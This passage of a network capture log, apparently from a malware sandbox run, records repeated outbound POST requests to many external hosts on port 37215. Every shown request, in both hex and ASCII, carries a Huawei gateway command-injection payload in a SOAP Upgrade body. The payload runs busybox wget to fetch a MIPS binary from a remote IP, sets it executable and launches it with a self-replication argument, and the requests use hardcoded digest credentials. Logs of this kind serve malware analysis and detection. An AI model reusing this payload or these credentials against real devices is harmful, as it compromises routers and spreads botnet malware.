                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    114192.168.2.1448438157.144.214.20337215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.186644077 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.606817007 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    115192.168.2.1452140157.50.56.24937215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.186644077 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.606817007 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    116192.168.2.145277432.202.29.24637215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.190185070 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.515286922 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    117192.168.2.1457070197.159.156.24137215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.190185070 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.515286922 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    118192.168.2.1445828157.51.85.7837215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.190243006 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.575381041 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    119192.168.2.1452712115.183.79.25237215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.190243006 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
